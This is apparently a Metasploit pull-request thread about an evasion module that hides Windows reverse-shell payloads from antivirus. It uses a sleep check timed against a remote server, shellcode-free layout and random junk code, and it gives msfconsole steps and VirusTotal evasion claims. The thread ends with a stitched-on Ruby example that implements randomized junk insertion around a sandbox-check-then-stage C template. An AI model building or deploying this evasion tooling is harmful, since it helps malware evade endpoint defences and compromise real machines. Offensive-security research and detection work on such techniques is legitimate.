Evasion module - no_shellcode/Time obfuscation #18804
Conversation
…work into evasion_module
I think it would be better to extract the "junk" functions into a function each, like done in modules/evasion/windows/syscall_inject.rb, and sprinkle them randomly into the C code, instead of hardcoding
Neat, thanks. Seems to target x86 specifically using the mingw stack; wondering if there's any benefit to including a staging hook for when the time check succeeds, either in C or via stager embedding, and allowing a 64b native target.
Hello, thanks for your comments,
Hey sempervictus, thanks for your comment. I'm sure this would work on 64b machines, thanks.
e.g. here. You could do something like this:

```ruby
# Insert a random amount of `junk` on random new lines in `payload`
payload_arr = payload.split("\n")
rand(12..24).times do
  # junk_code(1) returns one junk snippet; it must be interpolated, not quoted literally
  payload_arr.insert(rand(0..payload_arr.size), junk_code(1))
end
payload = payload_arr.join("\n")
```
Thanks, I will put this in the code tomorrow.
This will work on 64b in either target case; most run 32b programs just fine - it's how they're run and the heuristic fingerprints of "it" in the target which concern me a bit. Since the evasion is making outbound HTTP calls already, it has most of the API needed to pull an HTTP stager/handoff to a session should the check pass.
Well, that will be way more complex than that; one must be careful about the function brackets, the if/else brackets, not adding junk_code outside a function, not adding it in its own function, and so on. What you're suggesting kinda implies a C parser...
…ific order to compile
Metasm has a basic C parser, might be of use.
Randomly replace
I've deleted the and added support for will do the
Is this ready for testing and a formal review? It's still marked as a draft but I see there have been some comments on it.
Hello, it's not ready yet. I still need to implement jvoisin's advice on randomizing the junk properly. I would also need a proper way to check for x86 or x64; I'm sure there is a better way than the @ pinst parsing. On top of that I would like to embed another evasion technique I have in mind in it. Unfortunately I was quite busy in the last month.
That's okay, I'm going to go ahead and attic this then until you have time to make the changes. Once you're ready, just tag me in this PR and I'll be happy to reopen it. Thanks!
Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it What does this generally mean? It could be one or more of several things:
We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
This is a new evasion module, with 2 techniques in it:
No_shellcode: there is no shellcode declared in the file, so no big data array in the .data section.
Time obfuscation: the well-known technique with a sleep, to check that the sleep is not simulated by the AV product, except that we check the time from a distant server (worldtimeapi), so no AV will trick us with a fake system clock.
It also includes some random junk code such as Fibonacci calculation, Euclidean calculation, binary search, or random array sorting.
Windows Defender should not block the payload and should not detect it, but once it is launched and the shell is connected to the Metasploit listener, it then gets detected by network traffic or in-memory analysis.
Verification
List the steps needed to make sure this thing works
```
msfconsole
use evasion/windows/time_obfuscation_no_shellcode
set payload windows/shell/reverse_tcp
set lhost ... ...
```
## VT demo
-> evasion module: https://www.virustotal.com/gui/file/24e9fd7219ea3a611947daa93efa95248f2deb15a2e33b8209ea375439c5b366
-> regular payload windows/meterpreter/reverse_tcp with msfvenom: https://www.virustotal.com/gui/file/651f07a81c44b38231d6708aa138239e865f8e9f336648b781ad4b8d13f9e92b?nocache=1
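The thread above raises two points that the PR itself leaves open: jvoisin's suggestion to sprinkle junk calls over the generated C at random, and the author's objection that blind line insertion breaks function and if/else brackets unless something parses the C. The following is an added example written for this review; it is not code from the PR or from Metasploit. It models the sleep/remote-time check the PR body describes as a small C template and then inserts junk calls only at statement boundaries inside non-junk function bodies, tracking brace depth line by line rather than parsing the full language. The junk functions, the template, the `remote_epoch()` and `stage_and_run()` helpers, and the seed are all assumptions for the illustration.

```ruby
# Added example (not code from this PR or from Metasploit): brace-aware junk
# insertion for the C source an evasion module emits. Junk calls are placed
# only after complete statements inside a non-junk function, so the output
# still compiles. Junk functions, template, remote_epoch(), stage_and_run()
# and the seed are assumptions made for this illustration.

# Junk of the kind the PR describes; each takes one unsigned argument so the
# inserter can call any of them with a random constant.
JUNK_FUNCS = {
  'junk_fib' => <<~C,
    static unsigned long junk_fib(unsigned n) {
      unsigned long a = 0, b = 1;
      for (unsigned i = 0; i < n; i++) { unsigned long t = a + b; a = b; b = t; }
      return a;
    }
  C
  'junk_gcd' => <<~C,
    static unsigned junk_gcd(unsigned a) {
      unsigned b = 360;
      while (b) { unsigned t = a % b; a = b; b = t; }
      return a;
    }
  C
}.freeze

# Constructed C template of the check the PR describes: sleep, then compare the
# time reported by a remote source before and after. The two prototypes are
# assumed helpers whose bodies are not part of the example.
TEMPLATE = <<~C
  #include <windows.h>
  #include <time.h>

  #define SLEEP_SECONDS 30
  #define TOLERANCE 5

  static time_t remote_epoch(void);  /* assumed: Unix time from a time server, 0 on error */
  static void stage_and_run(void);   /* assumed: fetch and run the stage */

  static int sleep_was_real(void) {
    time_t before = remote_epoch();
    if (before == 0) return 0;
    Sleep(SLEEP_SECONDS * 1000);
    time_t after = remote_epoch();
    if (after == 0) return 0;
    return (after - before) >= (SLEEP_SECONDS - TOLERANCE);
  }

  int main(void) {
    if (!sleep_was_real()) return 0;
    stage_and_run();
    return 0;
  }
C

FN_START = /(\w+)\s*\([^;]*\)\s*\{\s*$/          # K&R-style header at depth 0
JUNK_CALL = /\A\s*\(void\)junk_\w+\(\d+\);\z/

# Indices of lines after which a junk call may go: a complete statement (ends
# with ';', not a return) inside a function not named junk_*, and not directly
# before an else. Braces inside string literals are not handled; the template has none.
def junk_sites(lines)
  sites = []
  depth = 0
  current = nil
  lines.each_with_index do |line, i|
    new_depth = depth + line.count('{') - line.count('}')
    if depth.zero? && new_depth > 0
      m = FN_START.match(line)
      current = m && m[1]
    end
    stmt = line.strip
    next_stmt = lines[i + 1].to_s.strip
    if new_depth > 0 && current && !current.start_with?('junk_') &&
       stmt.end_with?(';') && !stmt.start_with?('return') && !next_stmt.start_with?('else')
      sites << i
    end
    depth = new_depth
    current = nil if depth.zero?
  end
  sites
end

# Add the junk definitions after the last #include, then sprinkle a random
# number of junk calls over the eligible sites (bottom-up so indices stay valid).
def sprinkle_junk(source, seed:, count_range: 3..6)
  rng = Random.new(seed)
  lines = source.split("\n")
  last_inc = lines.rindex { |l| l.start_with?('#include') } || -1
  defs = JUNK_FUNCS.values.shuffle(random: rng).flat_map { |d| [''] + d.split("\n") }
  lines.insert(last_inc + 1, *defs)
  sites = junk_sites(lines)
  n = [rng.rand(count_range), sites.size].min
  sites.sample(n, random: rng).sort.reverse_each do |i|
    name = JUNK_FUNCS.keys.sample(random: rng)
    indent = lines[i][/\A\s*/]
    lines.insert(i + 1, "#{indent}(void)#{name}(#{rng.rand(3..40)});")
  end
  lines.join("\n") + "\n"
end

def junk_call_indices(source)
  source.split("\n").each_with_index.select { |l, _| l.match?(JUNK_CALL) }.map(&:last)
end

puts sprinkle_junk(TEMPLATE, seed: 7) if __FILE__ == $PROGRAM_NAME
```

Running the file prints one randomized variant; a different seed gives a different layout, which is the property the module wants across generated samples. Skipping `return` lines keeps the junk reachable, and the `else` check covers brace-less `if`/`else` pairs, which is the case a naive line splitter would break first.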